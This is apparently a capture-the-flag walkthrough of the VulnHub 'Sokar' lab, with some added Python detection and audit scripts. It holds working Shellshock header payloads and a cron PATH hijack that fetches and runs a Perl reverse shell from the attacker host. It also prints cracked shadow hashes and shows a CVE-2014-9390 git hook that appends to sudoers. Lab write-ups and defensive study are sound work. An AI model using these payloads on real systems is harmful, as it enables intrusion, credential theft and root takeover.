piyr9

A Curious Mind with a Craving for Information to Life's many Problems.

Overview

Break out the Tylenol, you will need it

Sokar seems to block pings, but scanning individual IPs directly still works.

Scanning the ports of sokar:

	root@foxkali:~# nmap -sV -p- 192.168.219.138

	Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-31 16:22 EST
	Discovered open port 591/tcp on 192.168.219.138
	Completed SYN Stealth Scan at 16:43, 1271.78s elapsed (65535 total ports)
	Initiating Service scan at 16:43
	Scanning 1 service on 192.168.219.138
	Completed Service scan at 16:43, 6.06s elapsed (1 service on 1 host)
	NSE: Script scanning 192.168.219.138.
	NSE: Starting runlevel 1 (of 1) scan.
	Nmap scan report for 192.168.219.138
	Host is up (0.00032s latency).
	Scanned at 2015-01-31 16:22:10 EST for 1291s
	Not shown: 65534 filtered ports
	PORT    STATE SERVICE VERSION
	591/tcp open  http    Apache httpd 2.2.15 ((CentOS))
	MAC Address: 08:00:27:F2:40:DB (Cadmus Computer Systems)

	Read data files from: /usr/bin/../share/nmap
	Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 1291.01 seconds
	           Raw packets sent: 131076 (5.767MB) | Rcvd: 8 (336B)

Open http://192.168.219.138:591/ in the browser and you see the sokar page.

Bash Shellshock Exploit

I realized the page is vulnerable to the Bash Shellshock exploit. Running the command below confirms it, and reading the mail in /var/spool/mail/bynarr we acquire a password for the user bynarr and an outbound ephemeral port, 51242.

	wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /var/spool/mail/bynarr" http://192.168.76.103:591/cgi-bin/cat

	Return-Path: <root@sokar>
	Delivered-To: bynarr@localhost
	Received:  from root by localhost
	To: <bynarr@sokar>
	Date: Thu, 13 Nov 2014 22:04:31 +0100
	Subject: Welcome

	Dear Bynarr.  Welcome to Sokar Inc. Forensic Development Team.
	A user account has been setup for you.

	UID 500 (bynarr)
	GID 500 (bynarr)
	    501 (forensic)

	Password 'fruity'.  Please change this ASAP.
	Should you require, you've been granted outbound ephemeral port access on 51242, to transfer non-sensitive forensic dumps out for analysis.

	All the best in your new role!
	
	  -Sokar-
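The request above works by putting a Bash function definition, the `() {` prefix, into a request header that the CGI handler passes on as an environment variable. From the defender's side that same prefix is the cheapest thing to look for in web server logs. The following is an added example, not code from the original post: a small Python scanner over Apache combined-format access log lines, run on a few constructed lines that mirror the requests in this walkthrough. The log lines, timestamps and user agents are constructed for the example.

```python
import re

# Bash function-definition prefix that Shellshock payloads carry in a header value;
# whitespace between "()" and "{" is optional, so the pattern allows it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent".
# Quoted fields may contain backslash-escaped quotes, as the walkthrough's payload does.
QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + QUOTED + r')" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>' + QUOTED + r')" "(?P<agent>' + QUOTED + r')"$'
)

# Constructed log lines (not from the original post's server): one probe carried in
# User-Agent, one benign browser hit, and one probe carried in Referer.
SAMPLE_LOG = r'''
192.168.76.102 - - [07/Feb/2015:23:54:43 -0500] "GET /cgi-bin/cat HTTP/1.1" 200 119 "-" "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /var/spool/mail/bynarr"
192.168.76.102 - - [07/Feb/2015:23:55:01 -0500] "GET / HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/35.0"
192.168.76.102 - - [07/Feb/2015:23:55:09 -0500] "GET /cgi-bin/cat HTTP/1.1" 200 87 "() { :;}; /bin/id" "Wget/1.16 (linux-gnu)"
'''


def parse_combined(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def scan_log(text):
    """Return one record per request whose attacker-controlled fields carry the prefix."""
    hits = []
    for line in text.strip().splitlines():
        entry = parse_combined(line)
        if entry is None:
            continue  # in production, count unparsable lines rather than dropping them silently
        # Only fields the CGI environment is built from matter: User-Agent, Referer, request line.
        fields = [f for f in ("agent", "referer", "request") if SHELLSHOCK_RE.search(entry[f])]
        if fields:
            hits.append({"ip": entry["ip"], "time": entry["time"],
                         "request": entry["request"], "fields": fields})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['time']} {hit['request']!r} prefix in {hit['fields']}")
```

The scanner checks User-Agent, Referer and the request line because those are the client-controlled values a CGI server exports into the environment of the script it runs. The fix is patching bash; while that is pending, blocking the `() {` prefix at the web server or WAF layer, or disabling CGI on hosts that do not need it, removes the path from header to shell.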

Looking at the .bash_profile of user bynarr, we can see that PATH includes ‘.’, which for bynarr is /home/bynarr. But wait a minute: the website on sokar shows the output of a few commands, and looking at them you can tell they are date, iostat, netstat and uptime.

Refresh the sokar page a few times and you can see that it only updates every minute, on the minute. There is only one likely cause of this: a crontab. What if one of the four commands it runs is not called with a full path? Then a file of the same name in /home/bynarr/ would be run instead.

Let's try it, with date first.

	wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo '/bin/cat /home/bynarr/.bashrc'>/home/bynarr/date" http://192.168.76.103:591/cgi-bin/cat
	wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/chmod 777 /home/bynarr/date" http://192.168.76.103:591/cgi-bin/cat

Sadly it didn't work: if you check the sokar website after it updates, the date output is still there. OK, let's try iostat.

	wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo '/bin/cat /home/bynarr/.bashrc'>/home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat
	wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/chmod 777 /home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat

Bingo! The sokar page refreshed and bynarr's .bashrc was in plain view. (Why .bashrc? No reason; it was the only file that was handy at the time.) The page read as follows:

	Wed Feb 4 04:21:02 GMT 2015
	04:21:02 up 3:38, 0 users, load average: 0.00, 0.00, 0.00

	Active Internet connections (servers and established)
	Proto Recv-Q Send-Q Local Address               Foreign Address             State
	tcp        0      0 :::591                      :::*                        LISTEN
	tcp        0      0 ::ffff:192.168.76.103:591   ::ffff:192.168.76.102:53896 TIME_WAIT
	tcp        0      0 ::ffff:192.168.76.103:591   ::ffff:192.168.76.102:53900 TIME_WAIT
	tcp        0      0 ::ffff:192.168.76.103:591   ::ffff:192.168.76.102:53899 TIME_WAIT
	tcp        0      0 ::ffff:192.168.76.103:591   ::ffff:192.168.76.102:53898 TIME_WAIT
	tcp        0      0 ::ffff:192.168.76.103:591   ::ffff:192.168.76.102:53897 TIME_WAIT
	udp        0      0 0.0.0.0:68                  0.0.0.0:*
	Active UNIX domain sockets (servers and established)
	Proto RefCnt Flags       Type       State         I-Node Path
	unix  2      [ ACC ]     STREAM     LISTENING     7331   @/com/ubuntu/upstart
	unix  2      [ ]         DGRAM                    7474   @/org/kernel/udev/udevd
	unix  4      [ ]         DGRAM                    8639   /dev/log
	unix  2      [ ]         DGRAM                    9729
	unix  2      [ ]         DGRAM                    8819
	unix  3      [ ]         DGRAM                    7490
	unix  3      [ ]         DGRAM                    7489

	# .bashrc

	# Source global definitions
	if [ -f /etc/bashrc ]; then
		. /etc/bashrc
	fi

	# User specific aliases and functions
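The hijack above needs two things at once: a cron command invoked by bare name, and a search path that lets a writable directory (here ‘.’, the current directory) win the lookup. Here is an added example, not from the original post, of a Python audit that parses a user crontab and reports both conditions, so the same weakness can be found before someone else does. The crontab text is constructed to resemble what the page observes (date, iostat, netstat and uptime written to the web root every minute); it is not Sokar's actual crontab, and the `housekeeping` entry is made up.

```python
import re

TIME_FIELDS = 5  # minute hour day-of-month month day-of-week (user crontab layout)
ENV_RE = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$")
SEPARATOR_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")  # crude split on shell separators

# Constructed crontab resembling the behaviour observed on Sokar; not its real crontab.
SAMPLE_CRONTAB = """\
# constructed example
PATH=.:/usr/local/bin:/usr/bin:/bin
* * * * * date > /var/www/html/index.html; iostat >> /var/www/html/index.html
* * * * * /bin/netstat -an >> /var/www/html/index.html && uptime >> /var/www/html/index.html
@reboot /usr/local/bin/housekeeping --quiet
"""


def path_risks(path_value):
    """PATH entries that let a non-system directory win the lookup for a bare command name:
    "." or an empty entry (both mean the current directory), and any relative entry."""
    risky = []
    for entry in path_value.split(":"):
        if entry in ("", ".") or not entry.startswith("/"):
            risky.append(entry or "(empty)")
    return risky


def simple_commands(cmdline):
    """Yield each simple command of a one-line sequence or pipeline (redirections stay attached)."""
    for piece in SEPARATOR_RE.split(cmdline):
        if piece.strip():
            yield piece.strip()


def audit_crontab(text):
    """Return findings for relative command names and unsafe PATH entries in a user crontab."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        env = ENV_RE.match(line)
        if env:  # environment assignment such as PATH=... or MAILTO=...
            if env.group(1) == "PATH":
                for entry in path_risks(env.group(2).strip().strip("\"'")):
                    findings.append({"line": lineno, "kind": "unsafe-path-entry", "detail": entry})
            continue
        shorthand = line.startswith("@")  # @reboot, @hourly, ...
        parts = line.split(None, 1 if shorthand else TIME_FIELDS)
        if len(parts) != (2 if shorthand else TIME_FIELDS + 1):
            findings.append({"line": lineno, "kind": "unparsed", "detail": line})
            continue
        for cmd in simple_commands(parts[-1]):
            name = cmd.split()[0]
            if not name.startswith("/"):
                findings.append({"line": lineno, "kind": "relative-command", "detail": name})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {f['kind']} {f['detail']}")
```

Cron's own default PATH is /usr/bin:/bin, so a bare `date` is only dangerous when the job inherits a broader PATH (from a PATH= line in the crontab, or from a login shell the job wraps itself in). Writing every command with its absolute path removes the dependency on PATH altogether, and is the cheapest fix for a job that runs as a user whose home directory is writable by a web-facing process.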

## Reverse Shell via Crontab

OK, next we need to get a reverse shell in place. Checking sokar, it seems to have Perl. On Kali Linux:

	cd /var/www
	cp /usr/share/webshells/perl/perl-reverse-shell.pl .

Change the reverse shell script to your IP address and port 51242; in this case my Kali IP address is 192.168.76.102.

Get ready to start Apache on Kali, but first we need to change its port, since bynarr can only reach us outbound on port 51242.

	nano /etc/apache2/ports.conf
	nano /etc/apache2/sites-available/default

With the port changed from 80 to 51242, we now start Apache2 on Kali.

Next we run the Shellshock exploit again, this time so that the crontab fetches the reverse shell script when it runs:

	wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo '/usr/bin/wget 192.168.76.102:51242/perl-reverse-shell.pl -O /tmp/prshell.pl'>/home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat

Check that it's there:

	root@fox-kali:~# wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/ls -ltra /tmp/*.pl" http://192.168.76.103:591/cgi-bin/cat
	--2015-02-07 23:54:43--  http://192.168.76.103:591/cgi-bin/cat
	Connecting to 192.168.76.103:591... connected.
	HTTP request sent, awaiting response... 200 OK
	Length: unspecified [text/plain]
	Saving to: `cat.43'

	    [ <=>                                                                                                                                        ] 119         --.-K/s   in 0.001s  

	2015-02-07 23:54:43 (179 KB/s) - `cat.43' saved [119]

	root@fox-kali:~# cat cat.43

	-rw-rw-r-- 1 bynarr bynarr 3718 Feb  8  2015 /tmp/prshell.pl

Awesome, it picked it up and it's in the /tmp folder on sokar. Next we fix up the permissions on the reverse shell:

	wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo '/bin/chmod 777 /tmp/prshell.pl'>/home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat
	wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo '/bin/ls -ltr /tmp/prshell.pl'>/home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat

	-rwxrwxrwx 1 bynarr bynarr 3718 Feb  8  2015 /tmp/prshell.pl

Stop the Apache2 server on Kali Linux, then fix up the permissions on iostat and tell it to run the reverse shell:

	wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/chmod 777 /home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat
	wget --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo '/usr/bin/perl /tmp/prshell.pl'>/home/bynarr/iostat" http://192.168.76.103:591/cgi-bin/cat

On the next crontab run on sokar we get our reverse shell:

	root@fox-kali:/var/www# nc -lvp 51242
	listening on [any] 51242 ...
	192.168.76.103: inverse host lookup failed: Unknown server error : Connection timed out
	connect to [192.168.76.102] from (UNKNOWN) [192.168.76.103] 48276
	 05:02:01 up  4:19,  0 users,  load average: 0.00, 0.00, 0.00
	USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
	Linux sokar 2.6.32-504.1.3.el6.x86_64 #1 SMP Tue Nov 11 17:57:25 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
	uid=500(bynarr) gid=501(bynarr) groups=501(bynarr),500(forensic)
	/
	apache: cannot set terminal process group (-1): Invalid argument
	apache: no job control in this shell
	[bynarr@sokar /]$ id
	id
	uid=500(bynarr) gid=501(bynarr) groups=501(bynarr),500(forensic)

Bingo! We are now user bynarr on sokar.

## Memory Forensics

The command sudo -l shows that bynarr only has sudo access to the file /home/bynarr/lime. OK, let's see what this file is.

Run lime as sudo:

	sudo /home/bynarr/lime
	add

OK, it seems to have dumped the RAM to /tmp/ram. Let's have a look. It appears to be binary with some readable text, so let's pull out the strings and see if we can read it. While grepping for the users apophis and root, I came across these two strings, which appear to be from /etc/shadow:

	strings /tmp/ram|grep "apophis"
	apophis:$6$0HQCZwUJ$rYYSk9SeqtbKv3aEe3kz/RQdpcka8K.2NGpPveVrE5qpkgSLTtE.Hvg0egWYcaeTYau11ahsRAWRDdT8jPltH.:16434:0:99999:7:::
	strings /tmp/ram|grep "root:"
	root:$6$cWQYjirZ$rADNjUFSiHmYp.UVdt4WYlmALhMXdkg9//9yuodQ2TFfiEWlAO0J6PRKesEfvu.3dfDb.7gTGgl/jesvFWs7l0:16434:0:99999:7:::

Next let's load up John the Ripper so we can crack these hashes:

	root@fox-kali:~# john --wordlist=/root/rockyou.txt sokar.db
	Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
	Use the "--format=crypt" option to force loading these as that type instead
	Loaded 2 password hashes with 2 different salts (sha512crypt [64/64])
	overdrive        (apophis)

I left John to crack overnight; it was able to crack the apophis password but not root's.
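The welcome mail grants bynarr an egress port "to transfer non-sensitive forensic dumps out for analysis", yet the dump just taken carries /etc/shadow records, and a sudo rule on a memory-acquisition tool hands them to whoever holds that account. As an added example, not code from the post, here is a Python check that does what `strings | grep` did above but generically: it screens a raw dump for shadow-style credential records so a host can refuse to ship a "non-sensitive" dump that is nothing of the sort. The dump bytes, user names and hashes are constructed for the example; the crypt scheme prefixes are the standard ones.

```python
import re


def printable_strings(blob, min_len=4):
    """Runs of printable ASCII of at least min_len bytes: roughly what strings(1) extracts."""
    return [m.group(0) for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


# A shadow(5) record: name, crypt(3) hash, then seven colon-separated ageing fields.
# Scheme prefixes: $1$ md5crypt, $5$ sha256crypt, $6$ sha512crypt, $2a/$2b/$2y$ bcrypt, $y$ yescrypt.
SHADOW_RECORD_RE = re.compile(
    rb"(?P<user>[a-z_][a-z0-9_-]*):"
    rb"(?P<hash>\$(?:1|5|6|2[aby]|y)\$[./A-Za-z0-9$]{20,}):"
    rb"(?P<ageing>\d*(?::\d*){6})"
)

# Constructed dump: binary noise around two shadow-style records (made-up salts and hashes)
# and a locked system account, which carries no crackable hash and is ignored.
SAMPLE_DUMP = (
    b"\x00\x01\x7f\xfe ELF\x00\x00"
    b"root:$6$c0nstrUct$" + b"Q" * 86 + b":16434:0:99999:7:::\n"
    b"\x00\x00\x00"
    b"sshd:!!:16386::::::\n"
    b"\xff\xff"
    b"analyst:$6$m4deUp01$" + b"w" * 86 + b":16434:0:99999:7:::\n"
    b"\x00garbage\x00"
)


def find_shadow_records(blob):
    """Return (user, scheme, hash) for every shadow-style record embedded in a binary dump."""
    found = []
    for s in printable_strings(blob):
        for m in SHADOW_RECORD_RE.finditer(s):
            hash_ = m.group("hash").decode("ascii")
            found.append((m.group("user").decode("ascii"), hash_.split("$")[1], hash_))
    return found


def dump_is_sensitive(blob):
    """Policy helper: a dump carrying any password hash is not a 'non-sensitive' dump."""
    return bool(find_shadow_records(blob))


if __name__ == "__main__":
    for user, scheme, _ in find_shadow_records(SAMPLE_DUMP):
        print(f"shadow record for {user} (crypt scheme ${scheme}$) present in dump")
    print("sensitive:", dump_is_sensitive(SAMPLE_DUMP))
```

The check prints only the user and scheme, never the hash itself, since the point of running it is to stop the hash travelling further. The real lesson from this box is narrower: a sudo rule that lets an unprivileged user dump physical memory is equivalent to giving that user every secret the kernel and every process currently hold.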

Next we upgrade the shell to an interactive one:

	[bynarr@sokar /]$ python -c 'import pty;pty.spawn("/bin/bash")'
	[bynarr@sokar /]$ /bin/sh -i

And we switch to user apophis using overdrive, the password we got from John the Ripper:

	sh-4.1$ su - apophis
	Password: overdrive
	[apophis@sokar ~]$ id
	id
	uid=501(apophis) gid=502(apophis) groups=502(apophis)

Alright, we are now user apophis. Looking at the user's home folder, we can see there is an executable here:

	[apophis@sokar ~]$ file build 
	file build
	build: setuid setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

Running the build executable:

	[apophis@sokar ~]$ ./build
	./build
	Build? (Y/N) Y
	Y
	Cloning into '/mnt/secret-project'...
	ssh: Could not resolve hostname sokar-dev: Temporary failure in name resolution
	fatal: Could not read from remote repository.

	Please make sure you have the correct access rights
	and the repository exists.

Hmm… It seems to be looking for a host called sokar-dev. We tell sokar that sokar-dev is our Kali machine by starting a DNS server on Kali and pointing sokar's nameserver at our IP address, 192.168.76.102.

Editing /etc/resolv.conf on sokar:

	echo "nameserver 192.168.76.102">/etc/resolv.conf

## Configure DNS on Kali

Install and configure a DNS server on Kali Linux:

	apt-get install bind9
	nano /etc/bind/named.conf.default-zones

Add the following lines to named.conf.default-zones

	zone "sokar-dev" {
		type master;
		file "/etc/bind/sokar-dev";
	};

	zone "192.in-addr.arpa" {
		type master;
		file "/etc/bind/db.192";
	};

Create two files with the following content, one for the forward zone and one for the reverse, called sokar-dev and db.192:

	root@fox-kali:/etc/bind# cat sokar-dev
	;
	; BIND data file for local loopback interface
	;
	$TTL	604800
	@	IN	SOA	sokar-dev. root.sokar-dev. (
				      2		; Serial
				 604800		; Refresh
				  86400		; Retry
				2419200		; Expire
				 604800 )	; Negative Cache TTL
	;
	@	IN	NS	sokar-dev.
	@	IN	A	192.168.76.102
	@	IN	AAAA	::1

	root@fox-kali:/etc/bind# cat db.192
	;
	; BIND reverse data file for local loopback interface
	;
	$TTL	604800
	@	IN	SOA	sokar-dev. root.sokar-dev. (
				      1		; Serial
				 604800		; Refresh
				  86400		; Retry
				2419200		; Expire
				 604800 )	; Negative Cache TTL
	;
	@	IN	NS	sokar-dev.
	102.76.168	IN	PTR	sokar-dev.

On Kali Linux, make the secret-project folder and run git init to start the repository:

	mkdir /root/secret-project
	cd /root/secret-project
	git init    # initialise /root/secret-project itself; the later git add/commit run from this directory

Running the build executable again (after removing /mnt/secret-project) clones the folder /root/secret-project from Kali over to /mnt/secret-project on sokar. Interesting…

Let's check the version of git:

	[apophis@sokar ~]$ git --version
	git --version
	git version 2.2.0

Some Googling shows that this version is vulnerable to CVE-2014-9390, the git bug where a repository containing a folder named .Git (or any other case variant of .git) gets merged into the real .git folder when checked out on a case-insensitive filesystem such as OS X or Windows. As a result this can help us get root.

The mount command even shows that the /mnt folder is vfat, aka FAT32/FAT16, which is case-insensitive:

	[apophis@sokar ~]$ mount
	mount
	/dev/sda1 on / type ext4 (rw)
	proc on /proc type proc (rw)
	sysfs on /sys type sysfs (rw)
	devpts on /dev/pts type devpts (rw,gid=5,mode=620)
	tmpfs on /dev/shm type tmpfs (rw)
	/dev/sdb1 on /mnt type vfat (rw,uid=501,gid=502)
	none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
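Fixed git versions (2.2.1 and later) refuse to write any path component that equals .git after case-folding, which is exactly what closes the .Git trick used below. As an added example that is not from the post or from git itself, here is a Python checker that applies the same rule to a list of repository paths, so a server-side hook or CI job can reject such a tree before anyone clones it onto a case-insensitive mount. The sample path list is constructed; the reason labels are my own.

```python
def dotgit_reason(path):
    """Return why a repository path is unsafe to check out on a case-insensitive filesystem,
    or None if it is fine. Rule: any component equal to ".git" after case-folding is rejected,
    because such a filesystem would merge it with the clone's real .git directory."""
    parts = [c for c in path.split("/") if c]
    for i, component in enumerate(parts):
        if component.casefold() == ".git":
            # Say what would land in the real .git: a hook is the worst case, since it executes.
            if i + 1 < len(parts) and parts[i + 1] == "hooks":
                return "hook-under-dotgit"
            return "dotgit-component"
    return None


def unsafe_tree_paths(paths):
    """Return (path, reason) for every path that a fixed git would refuse to write."""
    return [(p, dotgit_reason(p)) for p in paths if dotgit_reason(p)]


# Constructed tree listing, in the shape of `git ls-tree -r --name-only HEAD` output.
SAMPLE_TREE = [
    "README.md",
    "src/main.c",
    ".Git/hooks/post-checkout",   # the variant used in this walkthrough
    "vendor/.GIT/config",         # nested variant: rejected by fixed git regardless of depth
    ".gitignore",                 # legitimate, not equal to .git
    ".git-tools/run.sh",          # legitimate
]


if __name__ == "__main__":
    for path, reason in unsafe_tree_paths(SAMPLE_TREE):
        print(f"reject {path}: {reason}")
```

In a pre-receive hook you would feed it the output of `git ls-tree -r --name-only <pushed-commit>`. Upgrading git is the real fix, since the fixed versions apply this check (and filesystem-specific equivalents) when writing the index on the client; this checker is the belt-and-braces version for the server side and for trees assembled outside git.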

On Kali, let's go ahead and exploit this bug:

	cd /root/secret-project
	mkdir .Git
	cd .Git
	mkdir hooks
	cd hooks

Since the post-checkout hook is executed after every clone, we can use that here:

	nano post-checkout

Let's have it run a command only root could: reading /etc/shadow.

	#!/bin/sh
	/bin/cat /etc/shadow

Make post-checkout executable and commit it:

	chmod +x post-checkout
	cd ../..
	git add .
	git commit -m 'git exploit'

On sokar we remove the folder and run build again:

	rm -rf /mnt/secret-project
	cd ~/

	[apophis@sokar ~]$ ./build
	./build
	Build? (Y/N) Y
	Y
	Cloning into '/mnt/secret-project'...
	root@sokar-dev's password: <redacted>

	remote: Counting objects: 14, done.        
	remote: Compressing objects: 100% (10/10), done.        
	remote: Total 14 (delta 1), reused 0 (delta 0)        
	Receiving objects: 100% (14/14), 14.17 KiB | 0 bytes/s, done.
	Resolving deltas: 100% (1/1), done.
	Checking connectivity... done.
	root:$6$cWQYjirZ$rADNjUFSiHmYp.UVdt4WYlmALhMXdkg9//9yuodQ2TFfiEWlAO0J6PRKesEfvu.3dfDb.7gTGgl/jesvFWs7l0:16434:0:99999:7:::
	bin:*:15628:0:99999:7:::
	daemon:*:15628:0:99999:7:::
	adm:*:15628:0:99999:7:::
	lp:*:15628:0:99999:7:::
	sync:*:15628:0:99999:7:::
	shutdown:*:15628:0:99999:7:::
	halt:*:15628:0:99999:7:::
	mail:*:15628:0:99999:7:::
	uucp:*:15628:0:99999:7:::
	operator:*:15628:0:99999:7:::
	games:*:15628:0:99999:7:::
	gopher:*:15628:0:99999:7:::
	ftp:*:15628:0:99999:7:::
	nobody:*:15628:0:99999:7:::
	vcsa:!!:16386::::::
	saslauth:!!:16386::::::
	postfix:!!:16386::::::
	sshd:!!:16386::::::
	bynarr:$6$UVZfMym7$9FFtl9Ky3ABFGErQlpQsKNOmAycJn4MlSRVHsSgVupDstQOifqqu3LvGwf3wmBvmfvh0IslwMo4/mhZ3qnVrM/:16434:0:99999:7:::
	apache:!!:16386::::::
	apophis:$6$0HQCZwUJ$rYYSk9SeqtbKv3aEe3kz/RQdpcka8K.2NGpPveVrE5qpkgSLTtE.Hvg0egWYcaeTYau11ahsRAWRDdT8jPltH.:16434:0:99999:7:::

Awesome! We can read /etc/shadow, so the hook runs as root. Now let's see if we can elevate.

On Kali we modify the post-checkout file again, this time adding apophis to /etc/sudoers with full root privileges:

	root@fox-kali:~/secret-project/.Git/hooks# nano post-checkout 

Adding this to post-checkout

	#!/bin/sh
	echo "apophis	ALL=(ALL) 	ALL" >> /etc/sudoers

Git commit again

	git commit post-checkout

Remove the folder and run build again:

	[apophis@sokar ~]$ rm -rf /mnt/secret-project
	[apophis@sokar ~]$ ./build

Home stretch

Let's try root escalation:

	[apophis@sokar ~]$ sudo /bin/bash
	sudo /bin/bash
	[root@sokar apophis]# id
	id
	uid=0(root) gid=0(root) groups=0(root)

Bingo!

	[root@sokar apophis]# cd /root
	[root@sokar ~]# cat flag
	cat flag
	                0   0
	                |   |
	            ____|___|____
	         0  |~ ~ ~ ~ ~ ~|   0
	         |  |   Happy   |   |
	      ___|__|___________|___|__
	      |/\/\/\/\/\/\/\/\/\/\/\/|
	  0   |    B i r t h d a y    |   0
	  |   |/\/\/\/\/\/\/\/\/\/\/\/|   |
	 _|___|_______________________|___|__
	|/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/|
	|                                   |
	|     V  u  l  n  H  u  b   ! !     |
	| ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ |
	|___________________________________|
	
	=====================================
	| Congratulations on beating Sokar! |
	|                                   |
	|  Massive shoutout to g0tmi1k and  |
	| the entire community which makes  |
	|         VulnHub possible!         |
	|                                   |
	|    rasta_mouse (@_RastaMouse)     |
	=====================================